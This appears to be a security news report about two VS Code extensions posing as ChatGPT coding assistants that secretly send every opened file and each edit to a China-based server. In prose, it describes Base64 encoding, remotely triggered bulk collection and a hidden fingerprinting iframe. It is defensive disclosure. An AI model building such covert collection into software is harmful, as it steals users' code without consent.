Cybersecurity researchers have discovered two malicious Microsoft Visual Studio Code (VS Code) extensions that are advertised as artificial intelligence (AI)-powered coding assistants, but also harbor covert functionality to siphon developer data to China-based servers.
The extensions, which have 1.5 million combined installs and are still available for download from the official Visual Studio Marketplace, are listed below -
- ChatGPT - 中文版 (ID: whensunset.chatgpt-china) - 1,340,869 installs
- ChatGPT - ChatMoss(CodeMoss)(ID: zhukunpeng.chat-moss) - 151,751 installs
Koi Security said the extensions are functional and work as expected, but they also capture every file being opened and every source code modification to servers located in China without users' knowledge or consent. The campaign has been codenamed MaliciousCorgi.
"Both contain identical malicious code -- the same spyware infrastructure running under different publisher names," security researcher Tuval Admoni said.
What makes the activity particularly dangerous is that the extensions work exactly as advertised, providing autocomplete suggestions and explaining coding errors, thereby avoiding raising any red flags and lowering the users' suspicion.
At the same time, the embedded malicious code is designed to read all of the contents of every file being opened, encode it in Base64 format, and send it to a server located in China ("aihao123[.]cn"). The process is triggered for every edit.
The extensions also incorporate a real-time monitoring feature that can be remotely triggered by the server, causing up to 50 files in the workspace to be exfiltrated. Also present in the extension's web view is a hidden zero-pixel iframe that loads four commercial analytics software development kits (SDKs) to fingerprint the devices and create extensive user profiles.
The four SDKs used are Zhuge.io, GrowingIO, TalkingData, and Baidu Analytics, all of which are major data analytics platforms based in China.